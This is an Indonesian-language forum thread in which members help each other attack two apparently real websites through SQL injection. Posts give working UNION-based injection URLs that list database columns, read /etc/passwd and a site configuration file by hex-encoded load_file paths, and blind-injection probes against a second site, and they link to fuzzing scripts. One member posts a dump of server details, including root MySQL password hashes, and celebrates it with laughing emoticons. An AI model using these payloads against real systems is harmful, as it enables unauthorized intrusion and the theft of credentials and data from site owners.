Sya Nemukan Bug Ne

anomie03 · Post by **anomie03** » Sat Feb 27, 2010 1:12 am

Langsung aja kale Ya Ne Pertama Saya Coba

-http://www.fragrance.org/news_detail.ph ... %28%29,6--
Hasilnya Bisa

Trus saya coba Lagi Yang Bawah Ne Masih Bisa Juga

-http://www.fragrance.org/news_detail.ph ... SE%28%29--

Tapi pas Saya Coba Untuk Cari Yang Dibawah Ne Gak Bisa
dak tau kenapa
- http://www.fragrance.org/news_detail.ph ... all+select 1,2,GROUP_CONCAT(column_NAME),4,5,6+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=( untuk Cari cover datanya pakek apa ya ?)
Kepada Temen Temen Saya Mohon Bantuanya

Post by **3xtr3m3b0y** » Sat Feb 27, 2010 10:09 am

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,group_concat(column_name),3,4,5,6+from+information_schema.columns+where+table_name=[Nama Tabel Dalam Bentuk Hexadecimal]--

Sebenarnya di awal kita sdh bisa mengetahui apakah nantinya pada penentuan Nama Tabel hrs menggunakan STRING atau HEXA, dengan mengetes sprt pada baris di bawah ini :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,'test',3,4,5,6--

Jika ERROR maka nantinya kita hrs menggunakan HEXA.
Hal ini sebenarnya terkait juga dengan sebuah directive di php.ini yaitu pada baris magic_quotes_gpc, jika baris itu bernilai OFF maka kita bisa menggunakan STRING namun jika ON maka kita hrs menggunakan nilai HEXA.

cloroplast · Post by **cloroplast** » Sat Feb 27, 2010 10:38 am

Target: http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1

:ngakak: :ngakak: :ngakak:

Post by **3xtr3m3b0y** » Sat Feb 27, 2010 12:17 pm

cloroplast wrote:Target: http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1

:ngakak: :ngakak: :ngakak:

Wah mantep Om hasil petualanganx... :love:

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,user(),3,4,5,6+from+mysql.user--

System User: root@localhost << mengizinkan kita menggunakan fasilitas tambahan di MySQL Server yaitu LOAD_FILE (Membaca File yg ada pada Sistem) dan INTO+OUTFILE (Membuat File pada Sistem). Hanya sayang berhubung direktif magic_quotes_gpc = on, maka fasilitas INTO+OUTFILE tdk bisa kita gunakan, krn fasilitas tersebut hanya bisa menggunakan STRING.

Untuk mengecek jenis OS yg digunakan, bermanfaat untuk menentukan struktur Direktori lokasi-lokasi penting di Sistem :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6--

Contoh membuka isi file /etc/passwd di sistem :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6--

selanjutnya bisa dikembangkan ke tahap berikutnya...

anomie03 · Post by **anomie03** » Sat Feb 27, 2010 6:44 pm

Trus situ yang menyediakan untuk menconversi bilang hexa ada g ?

untouch · Post by **untouch** » Sat Feb 27, 2010 6:48 pm

3xtr3m3b0y wrote:
cloroplast wrote:Target: http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1

:ngakak: :ngakak: :ngakak:
Wah mantep Om hasil petualanganx... :love:
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,user(),3,4,5,6+from+mysql.user--
System User: root@localhost << mengizinkan kita menggunakan fasilitas tambahan di MySQL Server yaitu LOAD_FILE (Membaca File yg ada pada Sistem) dan INTO+OUTFILE (Membuat File pada Sistem). Hanya sayang berhubung direktif magic_quotes_gpc = on, maka fasilitas INTO+OUTFILE tdk bisa kita gunakan, krn fasilitas tersebut hanya bisa menggunakan STRING.

Untuk mengecek jenis OS yg digunakan, bermanfaat untuk menentukan struktur Direktori lokasi-lokasi penting di Sistem :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6--
Contoh membuka isi file /etc/passwd di sistem :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6--
selanjutnya bisa dikembangkan ke tahap berikutnya...

@3xtr3m3b0y

mantap...... selanjutnya gmn lg sob .. :love:

anomie03 · Post by **anomie03** » Sat Feb 27, 2010 7:44 pm

trus di buat kaya gine bagaimana selanjutnya untuk dapatkan login admin nya

http://www.fragrance.org/news_detail.ph ... admin%20--

abit doang · Post by **abit doang** » Sat Feb 27, 2010 9:53 pm

anomie03 wrote:Trus situ yang menyediakan untuk menconversi bilang hexa ada g ?

string to hex
www.string-functions.com/string-hex.aspx

hex to string
www.string-functions.com/hex-string.aspx

anomie03 · Post by **anomie03** » Sat Feb 27, 2010 10:27 pm

gak ngerti dengan ini site bugnya di mana?
http://www.vero-software.com/news_detai ... der+by+2--

Post by **3xtr3m3b0y** » Sat Feb 27, 2010 11:39 pm

untouch wrote: @3xtr3m3b0y
mantap...... selanjutnya gmn lg sob .. :love:

Next Clue :

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+select+1,2,3,4,load_file(0x2f7573722f6c6f63616c2f617061636865322f6874646f63732f436f6e6e656374696f6e732f636f6e6e46462e706870),6--

Setelah halaman terbuka, coba View Source...

anomie03 wrote:gak ngerti dengan ini site bugnya di mana?
http://www.vero-software.com/news_detai ... der+by+2--

Blind SQL :

Code: Select all

http://www.vero-software.com/news_detail.php?id=22+and+substring(@@version,1,1)=4   << FALSE
http://www.vero-software.com/news_detail.php?id=22+and+substring(@@version,1,1)=5   << TRUE

Dari baris di atas diketahui menggunakan mysql versi 5
Untuk mempermudah pencarian bisa menggunakan bantuan :
http://www.darkc0de.com/others/blindfuzz.py
http://www.darkc0de.com/others/blindext.py

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Sya Nemukan Bug Ne

Sya Nemukan Bug Ne

Re: Sya Nemukan Bug Ne

Re: Sya Nemukan Bug Ne

Re: Sya Nemukan Bug Ne

Re: Sya Nemukan Bug Ne

Re: Sya Nemukan Bug Ne

Re: Sya Nemukan Bug Ne

Re: Sya Nemukan Bug Ne

Oline betar Ketemu Ne bug lagi

Re: Sya Nemukan Bug Ne